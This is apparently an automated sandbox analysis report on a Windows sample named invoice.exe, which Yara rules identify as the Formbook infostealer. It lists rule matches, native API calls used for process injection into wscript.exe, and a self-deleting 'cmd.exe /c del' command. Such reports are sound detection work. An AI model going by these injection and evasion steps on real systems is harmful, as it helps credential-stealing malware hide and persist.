          Source: Yara matchFile source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: invoice.exe
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_004181D0 NtCreateFile,3_2_004181D0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00418280 NtReadFile,3_2_00418280
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00418300 NtClose,3_2_00418300
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_004183B0 NtAllocateVirtualMemory,3_2_004183B0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_0041827A NtReadFile,3_2_0041827A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_004182FB NtReadFile,3_2_004182FB
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_004183AA NtAllocateVirtualMemory,3_2_004183AA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9540 NtReadFile,LdrInitializeThunk,9_2_046A9540
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A95D0 NtClose,LdrInitializeThunk,9_2_046A95D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9660 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_046A9660
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9650 NtQueryValueKey,LdrInitializeThunk,9_2_046A9650
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A96E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_046A96E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A96D0 NtCreateKey,LdrInitializeThunk,9_2_046A96D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9710 NtQueryInformationToken,LdrInitializeThunk,9_2_046A9710
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9FE0 NtCreateMutant,LdrInitializeThunk,9_2_046A9FE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9780 NtMapViewOfSection,LdrInitializeThunk,9_2_046A9780
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9860 NtQuerySystemInformation,LdrInitializeThunk,9_2_046A9860
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9840 NtDelayExecution,LdrInitializeThunk,9_2_046A9840
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_046A9910
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A99A0 NtCreateSection,LdrInitializeThunk,9_2_046A99A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9A50 NtCreateFile,LdrInitializeThunk,9_2_046A9A50
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9560 NtWriteFile,9_2_046A9560
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9520 NtWaitForSingleObject,9_2_046A9520
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046AAD30 NtSetContextThread,9_2_046AAD30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A95F0 NtQueryInformationFile,9_2_046A95F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9670 NtQueryInformationProcess,9_2_046A9670
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9610 NtEnumerateValueKey,9_2_046A9610
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9760 NtOpenProcess,9_2_046A9760
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046AA770 NtOpenThread,9_2_046AA770
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9770 NtSetInformationFile,9_2_046A9770
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9730 NtQueryVirtualMemory,9_2_046A9730
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046AA710 NtOpenProcessToken,9_2_046AA710
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A97A0 NtUnmapViewOfSection,9_2_046A97A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046AB040 NtSuspendThread,9_2_046AB040
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9820 NtEnumerateKey,9_2_046A9820
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A98F0 NtReadVirtualMemory,9_2_046A98F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A98A0 NtWriteVirtualMemory,9_2_046A98A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9950 NtQueueApcThread,9_2_046A9950
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A99D0 NtCreateProcessEx,9_2_046A99D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9A20 NtResumeThread,9_2_046A9A20
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9A00 NtProtectVirtualMemory,9_2_046A9A00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9A10 NtQuerySection,9_2_046A9A10
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9A80 NtOpenDirectoryObject,9_2_046A9A80
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A9B00 NtSetValueKey,9_2_046A9B00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046AA3B0 NtGetContextThread,9_2_046AA3B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C8280 NtReadFile,9_2_021C8280
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C8300 NtClose,9_2_021C8300
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C83B0 NtAllocateVirtualMemory,9_2_021C83B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C81D0 NtCreateFile,9_2_021C81D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C827A NtReadFile,9_2_021C827A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C82FB NtReadFile,9_2_021C82FB
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C83AA NtAllocateVirtualMemory,9_2_021C83AA
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_008020500_2_00802050
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_011794A80_2_011794A8
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0117DCF40_2_0117DCF4
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0117C1480_2_0117C148
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0117E2180_2_0117E218
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0117A7480_2_0117A748
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0117DCE80_2_0117DCE8
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF00400_2_02BF0040
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF59300_2_02BF5930
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF13310_2_02BF1331
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF13400_2_02BF1340
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF00060_2_02BF0006
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF55580_2_02BF5558
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF55480_2_02BF5548
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF1A380_2_02BF1A38
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF1A270_2_02BF1A27
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF5B950_2_02BF5B95
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF5B3B0_2_02BF5B3B
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF5B5A0_2_02BF5B5A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF28F70_2_02BF28F7
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_0041C8033_2_0041C803
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00408C6B3_2_00408C6B
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00408C703_2_00408C70
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_0041C5983_2_0041C598
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00D720503_2_00D72050
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0472D4669_2_0472D466
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467841F9_2_0467841F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04731D559_2_04731D55
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04660D209_2_04660D20
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04732D079_2_04732D07
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467D5E09_2_0467D5E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_047325DD9_2_047325DD
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046925819_2_04692581
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04686E309_2_04686E30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0472D6169_2_0472D616
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04732EF79_2_04732EF7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04731FF19_2_04731FF1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_047210029_2_04721002
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_047328EC9_2_047328EC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046920A09_2_046920A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_047320A89_2_047320A8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467B0909_2_0467B090
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046841209_2_04684120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466F9009_2_0466F900
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_047322AE9_2_047322AE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04732B289_2_04732B28
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0472DBD29_2_0472DBD2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469EBB09_2_0469EBB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021CC8039_2_021CC803
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021B2FB09_2_021B2FB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021B8C709_2_021B8C70
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021B8C6B9_2_021B8C6B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021CC5989_2_021CC598
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021B2D909_2_021B2D90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0466B150 appears 35 times
          Source: invoice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: invoice.exeBinary or memory string: OriginalFilename vs invoice.exe
          Source: invoice.exe, 00000000.00000000.221487542.0000000000802000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCharTypeInfo.exeD vs invoice.exe
          Source: invoice.exe, 00000000.00000002.253920792.00000000074A0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll" vs invoice.exe
          Source: invoice.exe, 00000000.00000002.245256874.0000000002EBE000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll2 vs invoice.exe
          Source: invoice.exeBinary or memory string: OriginalFilename vs invoice.exe
          Source: invoice.exe, 00000003.00000000.241463096.0000000000D72000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCharTypeInfo.exeD vs invoice.exe
          Source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs invoice.exe
          Source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice.exe
          Source: invoice.exeBinary or memory string: OriginalFilenameCharTypeInfo.exeD vs invoice.exe
          Source: invoice.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: invoice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@15/8
          Source: C:\Users\user\Desktop\invoice.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_01
          Source: invoice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\invoice.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: unknownProcess created: C:\Users\user\Desktop\invoice.exe 'C:\Users\user\Desktop\invoice.exe'
          Source: C:\Users\user\Desktop\invoice.exeProcess created: C:\Users\user\Desktop\invoice.exe C:\Users\user\Desktop\invoice.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\invoice.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\invoice.exeProcess created: C:\Users\user\Desktop\invoice.exe C:\Users\user\Desktop\invoice.exeJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\invoice.exe'Jump to behavior
          Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: invoice.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp, wscript.exe, 00000009.00000002.492637672.000000000475F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp, wscript.exe
          Source: Binary string: wscript.pdb source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0081855F push dword ptr [esi+3Fh]; iretd 0_2_00818571
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_008192CB push FFFFFFD9h; iretd 0_2_008192E8
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_02BF6A44 push A1FFFFFEh; ret 0_2_02BF6A49
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_004161E2 push 00000062h; ret 3_2_004161E5
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_0041B3C5 push eax; ret 3_2_0041B418
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_0041B47C push eax; ret 3_2_0041B482
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_0041B412 push eax; ret 3_2_0041B418
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_0041B41B push eax; ret 3_2_0041B482
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_004157E0 push esi; ret 3_2_00415809
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00D892CB push FFFFFFD9h; iretd 3_2_00D892E8
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00D8855F push dword ptr [esi+3Fh]; iretd 3_2_00D88571
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046BD0D1 push ecx; ret 9_2_046BD0E4
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021CB3C5 push eax; ret 9_2_021CB418
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C61E2 push 00000062h; ret 9_2_021C61E5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021C57E0 push esi; ret 9_2_021C5809
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021CB41B push eax; ret 9_2_021CB482
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021CB412 push eax; ret 9_2_021CB418
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_021CB47C push eax; ret 9_2_021CB482
          Source: initial sampleStatic PE information: section name: .text entropy: 7.55515603565
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
